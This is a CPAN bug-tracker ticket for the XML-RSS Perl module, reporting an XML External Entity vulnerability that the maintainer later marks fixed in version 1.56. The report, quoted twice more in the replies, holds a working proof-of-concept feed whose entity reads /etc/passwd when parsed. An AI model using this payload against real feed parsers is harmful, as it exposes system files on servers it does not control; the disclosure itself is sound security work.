Skip Menu |

This queue is for tickets about the XML-RSS CPAN distribution.

Report information
The Basics
Id: 100660
Status: resolved
Priority: 0/
Queue: XML-RSS
People
Owner: Nobody in particular
Requestors: MCARDWELL [...] cpan.org
Cc:
AdminCc:
Bug Information
Severity: (no value)
Broken in: (no value)
Fixed in: (no value)

History Show all quoted text
  Tue Dec 02 06:28:40 2014 MCARDWELL [...] cpan.org - Ticket created
Subject: XML External Entities Vulnerability
This module is vulnerable to a XML External Entities Exploit, as described here: http://mikeknoop.com/lxml-xxe-exploit/ Try parsing the following feed on a Linux system and you'll see the contents of your /etc/passwd included in the output: <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE title [ <!ELEMENT title ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> <channel> <title>The Blog</title> <link>http://example.com/</link> <description>A blog about things</description> <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> <item> <title>&xxe;</title> <link>http://example.com</link> <description>a post</description> <author>author@example.com</author> <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate> </item> </channel> </rss> This was originally reported for XML::Feed at https://github.com/davorg/xml-feed/issues/15 and they pointed me in this direction.
  Thu Dec 04 10:29:20 2014 SHLOMIF [...] cpan.org - Correspondence added
On Tue Dec 02 06:28:40 2014, MCARDWELL wrote: Show quoted text
> This module is vulnerable to a XML External Entities Exploit, as > described here: > > http://mikeknoop.com/lxml-xxe-exploit/ > > Try parsing the following feed on a Linux system and you'll see the > contents of your /etc/passwd included in the output: > > <?xml version="1.0" encoding="UTF-8"?> > <!DOCTYPE title [ <!ELEMENT title ANY > > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> > <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> > <channel> > <title>The Blog</title> > <link>http://example.com/</link> > <description>A blog about things</description> > <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> > <item> > <title>&xxe;</title> > <link>http://example.com</link> > <description>a post</description> > <author>author@example.com</author> > <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate> > </item> > </channel> > </rss> > > This was originally reported for XML::Feed at > https://github.com/davorg/xml-feed/issues/15 and they pointed me in > this direction.
Hi, thanks for the report, I'll look into it in the future. In the meanwhile, a patch adding a failing test or a pull request with the complete fix will be appreciated: https://github.com/shlomif/perl-XML-RSS/
  Thu Dec 04 10:29:20 2014 The RT System itself - Status changed from 'new' to 'open'
  Thu Dec 04 11:04:35 2014 SHLOMIF [...] cpan.org - Correspondence added
Hi! This was fixed in XML-RSS-1.56. RESOLVEing. Regards, -- Shlomi Fish On Thu Dec 04 10:29:20 2014, SHLOMIF wrote: Show quoted text
> On Tue Dec 02 06:28:40 2014, MCARDWELL wrote:
> > This module is vulnerable to a XML External Entities Exploit, as > > described here: > > > > http://mikeknoop.com/lxml-xxe-exploit/ > > > > Try parsing the following feed on a Linux system and you'll see the > > contents of your /etc/passwd included in the output: > > > > <?xml version="1.0" encoding="UTF-8"?> > > <!DOCTYPE title [ <!ELEMENT title ANY > > > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> > > <rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"> > > <channel> > > <title>The Blog</title> > > <link>http://example.com/</link> > > <description>A blog about things</description> > > <lastBuildDate>Mon, 03 Feb 2014 00:00:00 -0000</lastBuildDate> > > <item> > > <title>&xxe;</title> > > <link>http://example.com</link> > > <description>a post</description> > > <author>author@example.com</author> > > <pubDate>Mon, 03 Feb 2014 00:00:00 -0000</pubDate> > > </item> > > </channel> > > </rss> > > > > This was originally reported for XML::Feed at > > https://github.com/davorg/xml-feed/issues/15 and they pointed me in > > this direction.
> > Hi, thanks for the report, I'll look into it in the future. In the > meanwhile, a patch adding a failing test or a pull request with the > complete fix will be appreciated: > > https://github.com/shlomif/perl-XML-RSS/
  Thu Dec 04 11:04:37 2014 SHLOMIF [...] cpan.org - Status changed from 'open' to 'resolved'